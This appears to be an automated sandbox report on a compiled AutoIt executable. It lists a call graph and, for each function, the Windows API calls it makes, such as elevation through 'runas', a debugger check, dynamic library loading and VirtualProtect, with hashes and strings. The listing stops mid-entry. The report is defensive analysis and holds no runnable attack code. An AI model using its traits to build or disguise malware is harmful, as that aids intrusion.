86100 431623 Sleep 86106 43163b timeGetTime 86100->86106 86115 409894 86100->86115 86101->86094 86101->86097 86101->86099 86101->86100 86107 40986e Sleep 86101->86107 86110 4098f1 TranslateMessage DispatchMessageW 86101->86110 86101->86115 86128 45e62e 116 API calls 86101->86128 86129 4319c9 VariantClear 86101->86129 86131 4092c0 VariantClear 86101->86131 86133 409030 86101->86133 86147 40d300 86101->86147 86152 40d320 86101->86152 86158 40b380 119 API calls ctype 86101->86158 86159 409a40 86101->86159 86283 409340 174 API calls ctype 86101->86283 86299 40e380 VariantClear ctype 86101->86299 86287 40d590 VariantClear 86103->86287 86106->86115 86111 409880 timeGetTime 86107->86111 86107->86115 86110->86101 86111->86115 86112 431673 CloseHandle 86112->86115 86113 40d590 VariantClear 86113->86115 86114 43170c GetExitCodeProcess CloseHandle 86114->86115 86115->86101 86115->86112 86115->86113 86115->86114 86116 46e641 134 API calls 86115->86116 86119 46dd22 133 API calls 86115->86119 86121 431781 Sleep 86115->86121 86130 4092c0 VariantClear 86115->86130 86284 447e59 75 API calls 86115->86284 86285 453b07 77 API calls 86115->86285 86286 4646a2 76 API calls 86115->86286 86288 444233 88 API calls _wcslen 86115->86288 86289 457509 VariantClear 86115->86289 86290 404120 86115->86290 86294 4717e3 VariantClear 86115->86294 86295 436272 6 API calls 86115->86295 86116->86115 86119->86115 86121->86101 86128->86101 86129->86101 86130->86115 86131->86101 86300 409110 117 API calls 86133->86300 86135 42ceb6 86311 410ae0 VariantClear ctype 86135->86311 86137 42cebf 86138 40906e 86138->86135 86139 42cea9 86138->86139 86141 4090a4 86138->86141 86310 45e62e 116 API calls 3 library calls 86139->86310 86301 404160 86141->86301 86144 4090f0 ctype 86144->86101 86145 4092c0 VariantClear 86146 4090be ctype 86145->86146 86146->86144 86146->86145 86148 4292e3 86147->86148 86151 40d30c 86147->86151 86149 429323 86148->86149 86150 4292fd TranslateAcceleratorW 86148->86150 86149->86101 86150->86151 86151->86101 86153 4296d0 86152->86153 86154 40d32f 86152->86154 86153->86101 86155 42972a IsDialogMessageW 86154->86155 86156 40d33c 86154->86156 86495 4340ec GetClassLongW 86154->86495 86155->86154 86155->86156 86156->86101 86158->86101 86160 409a66 _wcslen 86159->86160 86161 40aade _realloc ctype 86160->86161 86162 41171a 75 API calls 86160->86162 86165 401380 75 API calls 86161->86165 86163 409a9c _realloc 86162->86163 86164 41171a 75 API calls 86163->86164 86166 409abd 86164->86166 86167 42cee9 86165->86167 86166->86161 86168 409aeb CharUpperBuffW 86166->86168 86171 409b09 ctype 86166->86171 86169 41171a 75 API calls 86167->86169 86168->86171 86211 42cf10 _realloc 86169->86211 86214 409b88 ctype 86171->86214 86497 47d10e 150 API calls 86171->86497 86173 42dbb9 86174 4092c0 VariantClear 86173->86174 86175 42e5e0 86174->86175 86527 410ae0 VariantClear ctype 86175->86527 86177 42e5f2 86178 409e4a 86181 41171a 75 API calls 86178->86181 86185 409ea4 86178->86185 86178->86211 86179 40aa5b 86182 41171a 75 API calls 86179->86182 86180 41171a 75 API calls 86180->86214 86181->86185 86198 40aa81 _realloc ctype 86182->86198 86183 40c3e0 75 API calls 86183->86214 86184 409ed0 86188 42d50d 86184->86188 86247 409ef8 _realloc ctype 86184->86247 86506 40b800 VariantClear VariantClear ctype 86184->86506 86185->86184 86186 41171a 75 API calls 86185->86186 86187 42d480 86186->86187 86191 42d491 86187->86191 86502 44b3f6 75 API calls 86187->86502 86193 42d527 86188->86193 86507 40b800 VariantClear VariantClear ctype 86188->86507 86189 40a3a7 86195 40a415 86189->86195 86241 42db5c 86189->86241 86190 42d195 VariantClear 86190->86214 86503 40df50 75 API calls 86191->86503 86193->86247 86508 40e2e0 VariantClear ctype 86193->86508 86200 41171a 75 API calls 86195->86200 86196 4092c0 VariantClear 86196->86214 86205 41171a 75 API calls 86198->86205 86218 40a41c 86200->86218 86205->86161 86206 42d4a6 86504 4530b3 75 API calls 86206->86504 86208 42db96 86513 45e62e 116 API calls 3 library calls 86208->86513 86210 42d128 86213 4092c0 VariantClear 86210->86213 86526 45e62e 116 API calls 3 library calls 86211->86526 86212 42d4d7 86505 4530b3 75 API calls 86212->86505 86220 42d131 86213->86220 86214->86173 86214->86178 86214->86179 86214->86180 86214->86183 86214->86190 86214->86196 86214->86198 86214->86210 86214->86211 86215 42d20c 86214->86215 86498 40c620 118 API calls 86214->86498 86500 40be00 75 API calls 2 library calls 86214->86500 86501 40e380 VariantClear ctype 86214->86501 86215->86101 86229 40a481 86218->86229 86514 40c8a0 VariantClear ctype 86218->86514 86499 410ae0 VariantClear ctype 86220->86499 86223 44b3f6 75 API calls 86223->86247 86225 402cc0 75 API calls 86225->86247 86226 4092c0 VariantClear 86257 40a534 _realloc ctype 86226->86257 86227 411421 74 API calls __cinit 86227->86247 86228 41171a 75 API calls 86228->86247 86230 40a4ed 86229->86230 86231 42dc1e VariantClear 86229->86231 86229->86257 86235 40a4ff ctype 86230->86235 86515 40e380 VariantClear ctype 86230->86515 86231->86235 86234 41171a 75 API calls 86234->86257 86235->86234 86235->86257 86236 4019e0 76 API calls 86236->86247 86239 42deb6 VariantClear 86239->86257 86240 40a73c 86242 42e237 86240->86242 86250 40a76b 86240->86250 86512 4721e5 VariantClear 86241->86512 86519 46e709 VariantClear VariantClear ctype 86242->86519 86243 42dfe9 VariantClear 86243->86257 86244 42df47 VariantClear 86244->86257 86246 40a7a2 86264 40a7ad ctype 86246->86264 86520 40b800 VariantClear VariantClear ctype 86246->86520 86247->86161 86247->86189 86247->86208 86247->86223 86247->86225 86247->86227 86247->86228 86247->86236 86247->86241 86248 40a053 86247->86248 86509 45ee98 75 API calls 86247->86509 86510 404260 76 API calls 86247->86510 86511 409210 VariantClear 86247->86511 86248->86101 86249 40e380 VariantClear 86249->86257 86250->86246 86272 40a800 ctype 86250->86272 86496 40b800 VariantClear VariantClear ctype 86250->86496 86253 41171a 75 API calls 86253->86257 86254 40a8b0 86265 40a8c2 ctype 86254->86265 86522 40e380 VariantClear ctype 86254->86522 86255 42e312 86258 42e337 VariantClear 86255->86258 86255->86265 86256 41171a 75 API calls 86259 42dd10 VariantInit VariantCopy 86256->86259 86257->86226 86257->86239 86257->86240 86257->86242 86257->86243 86257->86244 86257->86249 86257->86253 86257->86256 86516 46e9cd 75 API calls 86257->86516 86517 409210 VariantClear 86257->86517 86518 44cc6c VariantClear ctype 86257->86518 86258->86265 86259->86257 86262 42dd30 VariantClear 86259->86262 86260 40a7ee 86260->86272 86521 40e380 VariantClear ctype 86260->86521 86261 42e3b2 86269 42e3da VariantClear 86261->86269 86276 40a91a ctype 86261->86276 86262->86257 86264->86260 86268 42e2a7 VariantClear 86264->86268 86264->86272 86265->86261 86267 40a908 86265->86267 86267->86276 86523 40e380 VariantClear ctype 86267->86523 86268->86272 86269->86276 86271 42e47f 86275 42e4a3 VariantClear 86271->86275 86281 40a957 ctype 86271->86281 86272->86254 86272->86255 86273 40a945 86273->86281 86524 40e380 VariantClear ctype 86273->86524 86275->86281 86276->86271 86276->86273 86278 40aa22 ctype 86278->86101 86279 42e559 VariantClear 86279->86281 86281->86278 86281->86279 86525 40e380 VariantClear ctype 86281->86525 86282->86094 86283->86101 86284->86115 86285->86115 86286->86115 86287->86115 86288->86115 86289->86115 86291 40412e 86290->86291 86292 4092c0 VariantClear 86291->86292 86293 404138 86292->86293 86293->86121 86294->86115 86295->86115 86296->86101 86297->86093 86298->86101 86299->86101 86300->86138 86302 4092c0 VariantClear 86301->86302 86303 40416e 86302->86303 86304 404120 VariantClear 86303->86304 86305 40419b 86304->86305 86312 4734b7 86305->86312 86354 480df5 86305->86354 86362 40efe0 86305->86362 86306 4041c6 86306->86135 86306->86146 86310->86135 86311->86137 86313 453063 111 API calls 86312->86313 86314 4734d7 86313->86314 86315 473545 86314->86315 86316 47350c 86314->86316 86370 463c42 86315->86370 86317 4092c0 VariantClear 86316->86317 86324 473514 86317->86324 86319 473558 86320 47355c 86319->86320 86337 473595 86319->86337 86322 4092c0 VariantClear 86320->86322 86321 473616 86383 463d7e 86321->86383 86331 473564 86322->86331 86324->86306 86325 473622 86327 473697 86325->86327 86328 47362c 86325->86328 86326 453063 111 API calls 86326->86337 86415 457838 86327->86415 86330 4092c0 VariantClear 86328->86330 86334 473634 86330->86334 86331->86306 86334->86306 86336 473655 86339 4092c0 VariantClear 86336->86339 86337->86321 86337->86326 86337->86336 86427 462f5a 87 API calls __wcsicoll 86337->86427 86350 47365d 86339->86350 86340 4736b0 86428 45e62e 116 API calls 3 library calls 86340->86428 86341 4736c9 86429 40e7e0 76 API calls 86341->86429 86344 4736ba GetCurrentProcess TerminateProcess 86344->86341 86345 4736db 86351 4736ff 86345->86351 86430 40d030 76 API calls 86345->86430 86347 4736f1 86431 46b945 134 API calls 2 library calls 86347->86431 86350->86306 86353 473731 86351->86353 86432 40d030 76 API calls 86351->86432 86433 46b945 134 API calls 2 library calls 86351->86433 86353->86306 86355 453081 111 API calls 86354->86355 86356 480e33 86355->86356 86455 402dd0 86356->86455 86358 480e3b 86360 480e65 86358->86360 86484 40e6d0 76 API calls 86358->86484 86360->86306 86361 480e9f 86361->86306 86363 40eff5 CreateFileW 86362->86363 86364 4299bf 86362->86364 86365 40f017 86363->86365 86364->86365 86366 4299c4 CreateFileW 86364->86366 86365->86306 86366->86365 86367 4299ea 86366->86367 86494 40e0d0 SetFilePointerEx SetFilePointerEx 86367->86494 86369 4299f5 86369->86365 86434 45335b 76 API calls 86370->86434 86372 463c5d 86435 442c52 80 API calls _wcslen 86372->86435 86374 463c72 86376 40c060 75 API calls 86374->86376 86382 463cac 86374->86382 86377 463c8e 86376->86377 86436 4608ce 75 API calls _realloc 86377->86436 86379 463ca4 86380 40c740 75 API calls 86379->86380 86380->86382 86381 463cf7 86381->86319 86382->86381 86437 462f5a 87 API calls __wcsicoll 86382->86437 86384 453063 111 API calls 86383->86384 86385 463d99 86384->86385 86386 463de0 86385->86386 86387 463dca 86385->86387 86444 40c760 78 API calls 86386->86444 86438 453081 86387->86438 86390 463dd0 LoadLibraryW 86401 463e09 86390->86401 86391 463de7 86399 463e19 86391->86399 86445 40c760 78 API calls 86391->86445 86392 463e3e 86395 463e4e 86392->86395 86396 463e7b 86392->86396 86394 463dfb 86394->86399 86446 40c760 78 API calls 86394->86446 86447 40d500 75 API calls 86395->86447 86449 40c760 78 API calls 86396->86449 86399->86325 86401->86392 86401->86399 86402 463e82 GetProcAddress 86406 463e90 86402->86406 86403 463e57 86448 45efe7 77 API calls ctype 86403->86448 86405 463e62 GetProcAddress 86407 463e79 86405->86407 86406->86399 86406->86407 86407->86406 86450 403470 75 API calls _realloc 86407->86450 86409 463eb4 86451 40d500 75 API calls 86409->86451 86411 463ebd 86452 45efe7 77 API calls ctype 86411->86452 86413 463ec8 GetProcAddress 86453 401330 ctype 86413->86453 86416 457a4c 86415->86416 86422 45785f _strcat _wcslen _wcscpy ctype 86415->86422 86423 410d40 86416->86423 86417 40c760 78 API calls 86417->86422 86418 453081 111 API calls 86418->86422 86419 443576 78 API calls 86419->86422 86420 4138ba 67 API calls _malloc 86420->86422 86421 40f580 77 API calls 86421->86422 86422->86416 86422->86417 86422->86418 86422->86419 86422->86420 86422->86421 86425 410d55 86423->86425 86424 410ded VirtualProtect 86426 410dbb 86424->86426 86425->86424 86425->86426 86426->86340 86426->86341 86427->86337 86428->86344 86429->86345 86430->86347 86431->86351 86432->86351 86433->86351 86434->86372 86435->86374 86436->86379 86437->86381 86439 45308c 86438->86439 86440 4530aa 86438->86440 86441 4530a1 86439->86441 86454 452e2a 111 API calls 5 library calls 86439->86454 86440->86390 86441->86390 86443 453098 86443->86390 86444->86391 86445->86394 86446->86401 86447->86403 86448->86405 86449->86402 86450->86409 86451->86411 86452->86413 86453->86399 86454->86443 86456 41171a 75 API calls 86455->86456 86457 402e03 86456->86457 86458 41171a 75 API calls 86457->86458 86482 402e16 ctype 86458->86482 86461 40305a ctype 86486 402cc0 75 API calls 2 library calls 86461->86486 86463 403770 75 API calls 86463->86482 86464 42b5fe 86490 45ffa9 118 API calls 3 library calls 86464->86490 86466 402cc0 75 API calls 86466->86482 86467 42b612 86483 403094 ctype 86467->86483 86491 45ffa9 118 API calls 3 library calls 86467->86491 86468 42b5c3 86489 45ffa9 118 API calls 3 library calls 86468->86489 86470 403470 75 API calls 86470->86482 86473 42b68a 86493 402cc0 75 API calls 2 library calls 86473->86493 86474 42b655 86476 42b5e1 86474->86476 86492 402cc0 75 API calls 2 library calls 86474->86492 86475 402ae0 75 API calls 86477 402ff0 CharUpperBuffW 86475->86477 86476->86483 86477->86482 86479 402650 75 API calls 86479->86482 86481 41171a 75 API calls 86481->86482 86482->86461 86482->86463 86482->86464 86482->86466 86482->86467 86482->86468 86482->86470 86482->86473 86482->86475 86482->86479 86482->86481 86485 4035d0 86 API calls 86482->86485 86487 402b70 76 API calls 86482->86487 86488 403530 118 API calls _realloc 86482->86488 86483->86358 86484->86361 86485->86482 86486->86483 86487->86482 86488->86482 86489->86476 86490->86467 86491->86474 86492->86476 86493->86483 86494->86369 86495->86154 86496->86246 86497->86171 86498->86214 86499->86278 86500->86214 86501->86214 86502->86191 86503->86206 86504->86212 86505->86184 86506->86188 86507->86193 86508->86247 86509->86247 86510->86247 86511->86247 86512->86208 86513->86173 86514->86218 86515->86235 86516->86257 86517->86257 86518->86257 86519->86246 86520->86264 86521->86272 86522->86265 86523->86276 86524->86281 86525->86281 86526->86173 86527->86177 86528 42919b 86533 40ef10 86528->86533 86531 411421 __cinit 74 API calls 86532 4291aa 86531->86532 86534 41171a 75 API calls 86533->86534 86535 40ef17 86534->86535 86536 42ad48 86535->86536 86541 40ef40 74 API calls __cinit 86535->86541 86538 40ef2a 86542 40e470 86538->86542 86541->86538 86543 40c060 75 API calls 86542->86543 86544 40e483 GetVersionExW 86543->86544 86545 4021e0 75 API calls 86544->86545 86546 40e4bb 86545->86546 86568 40e600 86546->86568 86553 42accc 86554 42ad28 GetSystemInfo 86553->86554 86557 42ad38 GetSystemInfo 86554->86557 86555 40e557 GetCurrentProcess 86588 40ee30 LoadLibraryA GetProcAddress 86555->86588 86558 40e56c 86558->86557 86581 40eee0 86558->86581 86561 40e5c9 86585 40eea0 86561->86585 86564 40e5e0 86566 40e5f1 FreeLibrary 86564->86566 86567 40e5f4 86564->86567 86565 40e5dd FreeLibrary 86565->86564 86566->86567 86567->86531 86569 40e60b 86568->86569 86570 40c740 75 API calls 86569->86570 86571 40e4c2 86570->86571 86572 40e620 86571->86572 86573 40e62a 86572->86573 86574 42ac93 86573->86574 86575 40c740 75 API calls 86573->86575 86576 40e4ce 86575->86576 86576->86553 86577 40ee70 86576->86577 86578 40e551 86577->86578 86579 40ee76 LoadLibraryA 86577->86579 86578->86555 86578->86558 86579->86578 86580 40ee87 GetProcAddress 86579->86580 86580->86578 86582 40e5bf 86581->86582 86583 40eee6 LoadLibraryA 86581->86583 86582->86554 86582->86561 86583->86582 86584 40eef7 GetProcAddress 86583->86584 86584->86582 86589 40eec0 LoadLibraryA GetProcAddress 86585->86589 86587 40e5d3 GetNativeSystemInfo 86587->86564 86587->86565 86588->86558 86589->86587 86590 42e89e 86597 40c000 86590->86597 86592 42e8ac 86593 409a40 165 API calls 86592->86593 86594 42e8ca 86593->86594 86608 44b92e VariantClear 86594->86608 86596 42f3ae 86598 40c014 86597->86598 86599 40c007 86597->86599 86601 40c01a 86598->86601 86602 40c02c 86598->86602 86609 409210 VariantClear 86599->86609 86610 409210 VariantClear 86601->86610 86605 41171a 75 API calls 86602->86605 86603 40c00f 86603->86592 86607 40c033 86605->86607 86606 40c023 86606->86592 86607->86592 86608->86596 86609->86603 86610->86606

                                                                                          Executed Functions

                                                                                          Function 00409A40 Relevance: 32.2, APIs: 15, Strings: 2, Instructions: 2432COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • _wcslen.LIBCMT ref: 00409A61
                                                                                            • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                            • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                            • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                            • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                                          • CharUpperBuffW.USER32(?,?), ref: 00409AF5
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: BuffCharException@8ThrowUpper_malloc_wcslenstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                                          • String ID: 0vH$4RH
                                                                                          • API String ID: 1143807570-2085553193
                                                                                          • Opcode ID: 6ed877a5d1cb41e7463924ba79375fc69617cb0e7df98969b0dc710bcd39381e
                                                                                          • Instruction ID: 7c8f52bff4b3ea9a641e6aac08ab5e1c8beb32691f0f21fab5f23224d73a3634
                                                                                          • Opcode Fuzzy Hash: 6ed877a5d1cb41e7463924ba79375fc69617cb0e7df98969b0dc710bcd39381e
                                                                                          • Instruction Fuzzy Hash: 34238170A043109FD724DF25D480A6BB7E1BF89304F54896EE84A9B391D739EC46CB9B
                                                                                          Function 0040D6D0 Relevance: 28.1, APIs: 11, Strings: 5, Instructions: 141windowCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • GetCurrentDirectoryW.KERNEL32(00000104,?,00000001,?,00000000), ref: 0040D6E5
                                                                                            • Part of subcall function 00401F80: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\XhAQ0Rk63O.exe,00000104,?,?,?,?,00000000), ref: 00401FAD
                                                                                            • Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 00402078
                                                                                            • Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 0040208E
                                                                                            • Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 004020A4
                                                                                            • Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 004020BA
                                                                                            • Part of subcall function 00401F80: _wcscpy.LIBCMT ref: 004020EF
                                                                                          • IsDebuggerPresent.KERNEL32(?), ref: 0040D6F1
                                                                                          • GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\XhAQ0Rk63O.exe,00000104,?,004A7CF8,004A7CFC), ref: 0040D763
                                                                                            • Part of subcall function 00401440: GetFullPathNameW.KERNEL32(?,00000104,?,00000000), ref: 00401483
                                                                                          • SetCurrentDirectoryW.KERNEL32(?,00000001,C:\Users\user\Desktop\XhAQ0Rk63O.exe,00000004), ref: 0040D7D6
                                                                                          • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,004846D6,00000010), ref: 00431AAB
                                                                                          • SetCurrentDirectoryW.KERNEL32(?,C:\Users\user\Desktop\XhAQ0Rk63O.exe,00000004), ref: 00431B0E
                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104,C:\Users\user\Desktop\XhAQ0Rk63O.exe,00000004), ref: 00431B3F
                                                                                          • GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 00431B8B
                                                                                          • ShellExecuteW.SHELL32(00000000), ref: 00431B92
                                                                                            • Part of subcall function 004101F0: GetSysColorBrush.USER32(0000000F), ref: 004101F9
                                                                                            • Part of subcall function 004101F0: LoadCursorW.USER32(00000000,00007F00), ref: 00410209
                                                                                            • Part of subcall function 004101F0: LoadIconW.USER32(?,00000063), ref: 0041021F
                                                                                            • Part of subcall function 004101F0: LoadIconW.USER32(?,000000A4), ref: 00410232
                                                                                            • Part of subcall function 004101F0: LoadIconW.USER32(?,000000A2), ref: 00410245
                                                                                            • Part of subcall function 004101F0: LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041026A
                                                                                            • Part of subcall function 004101F0: RegisterClassExW.USER32 ref: 004102C6
                                                                                            • Part of subcall function 004103E0: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 00410415
                                                                                            • Part of subcall function 004103E0: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 0041043E
                                                                                            • Part of subcall function 004103E0: ShowWindow.USER32(?,00000000), ref: 00410454
                                                                                            • Part of subcall function 004103E0: ShowWindow.USER32(?,00000000), ref: 0041045E
                                                                                            • Part of subcall function 0040E1E0: _memset.LIBCMT ref: 0040E202
                                                                                            • Part of subcall function 0040E1E0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E2C7
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: LoadWindow$IconName__wcsicoll$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memset_wcscpy
                                                                                          • String ID: @GH$@GH$C:\Users\user\Desktop\XhAQ0Rk63O.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                                                                                          • API String ID: 2493088469-2787690847
                                                                                          • Opcode ID: 1a0ed8742bd98226e3ba0f055742ccaca08136dd93b2b863f89549b94dfb798c
                                                                                          • Instruction ID: f6e0ab4c143dd9a1f797559286fb6c41f0380d60009eb7dc722615656bf0e84e
                                                                                          • Opcode Fuzzy Hash: 1a0ed8742bd98226e3ba0f055742ccaca08136dd93b2b863f89549b94dfb798c
                                                                                          • Instruction Fuzzy Hash: 0341F731618341ABD320F7A19C49BAF3BA4AB96704F04493FF941672D1DBBC9949C72E
                                                                                          Function 0040E470 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 165COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1254 40e470-40e500 call 40c060 GetVersionExW call 4021e0 call 40e600 call 40e620 1263 40e506-40e509 1254->1263 1264 42accc-42acd1 1254->1264 1267 40e540-40e555 call 40ee70 1263->1267 1268 40e50b-40e51c 1263->1268 1265 42acd3-42acdb 1264->1265 1266 42acdd-42ace0 1264->1266 1270 42ad12-42ad20 1265->1270 1271 42ace2-42aceb 1266->1271 1272 42aced-42acf0 1266->1272 1281 40e557-40e573 GetCurrentProcess call 40ee30 1267->1281 1282 40e579-40e5a8 1267->1282 1273 40e522-40e525 1268->1273 1274 42ac9b-42aca7 1268->1274 1280 42ad28-42ad2d GetSystemInfo 1270->1280 1271->1270 1272->1270 1278 42acf2-42ad06 1272->1278 1273->1267 1279 40e527-40e537 1273->1279 1276 42acb2-42acba 1274->1276 1277 42aca9-42acad 1274->1277 1276->1267 1277->1267 1283 42ad08-42ad0c 1278->1283 1284 42ad0e 1278->1284 1285 42acbf-42acc7 1279->1285 1286 40e53d 1279->1286 1288 42ad38-42ad3d GetSystemInfo 1280->1288 1281->1282 1295 40e575 1281->1295 1282->1288 1289 40e5ae-40e5c3 call 40eee0 1282->1289 1283->1270 1284->1270 1285->1267 1286->1267 1289->1280 1294 40e5c9-40e5db call 40eea0 GetNativeSystemInfo 1289->1294 1298 40e5e0-40e5ef 1294->1298 1299 40e5dd-40e5de FreeLibrary 1294->1299 1295->1282 1300 40e5f1-40e5f2 FreeLibrary 1298->1300 1301 40e5f4-40e5ff 1298->1301 1299->1298 1300->1301
                                                                                          APIs
                                                                                          • GetVersionExW.KERNEL32 ref: 0040E495
                                                                                            • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                          • GetCurrentProcess.KERNEL32(?,?), ref: 0040E560
                                                                                          • GetNativeSystemInfo.KERNELBASE(?,?), ref: 0040E5D3
                                                                                          • FreeLibrary.KERNEL32(?), ref: 0040E5DE
                                                                                          • FreeLibrary.KERNEL32(?), ref: 0040E5F2
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_wcslen
                                                                                          • String ID: pMH$Wu
                                                                                          • API String ID: 2923339712-3104548426
                                                                                          • Opcode ID: 3f36deb7b7369dd68d3c05326faf84e57561e58110467ef3184d2bc56fc1d5cf
                                                                                          • Instruction ID: 31d199e0849a18b4fe3a20375a839c17b1fda7a8e5a404adfed2e153d323e8b3
                                                                                          • Opcode Fuzzy Hash: 3f36deb7b7369dd68d3c05326faf84e57561e58110467ef3184d2bc56fc1d5cf
                                                                                          • Instruction Fuzzy Hash: D4612E71508792AEC311CB69C44425ABFE07B6A308F580E6EE48483A42D379E568C7AB
                                                                                          Function 0040EB70 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • LoadLibraryA.KERNELBASE(uxtheme.dll,0040EB55,0040D86E), ref: 0040EB7B
                                                                                          • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EB8D
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressLibraryLoadProc
                                                                                          • String ID: IsThemeActive$uxtheme.dll
                                                                                          • API String ID: 2574300362-3542929980
                                                                                          • Opcode ID: 9e55e894ab04f38af4b02d6559f2dae0f2ca0bab174211e780b997e8b6ae5f43
                                                                                          • Instruction ID: e8120cabfd18d8fe06d2f96d8b82b2b5a4bcadd10797c678d2963416b1e4c3b8
                                                                                          • Opcode Fuzzy Hash: 9e55e894ab04f38af4b02d6559f2dae0f2ca0bab174211e780b997e8b6ae5f43
                                                                                          • Instruction Fuzzy Hash: 05D0C9B49407039AD7306F72C918B0A7BE4AB50342F204C3EF996A1694DBBCD0508B28
                                                                                          Function 00410B90 Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 167registryCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                            • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00410C44
                                                                                          • __wsplitpath.LIBCMT ref: 00410C61
                                                                                            • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                                                                                          • _wcsncat.LIBCMT ref: 00410C78
                                                                                          • __wmakepath.LIBCMT ref: 00410C94
                                                                                            • Part of subcall function 00413E3C: __wmakepath_s.LIBCMT ref: 00413E52
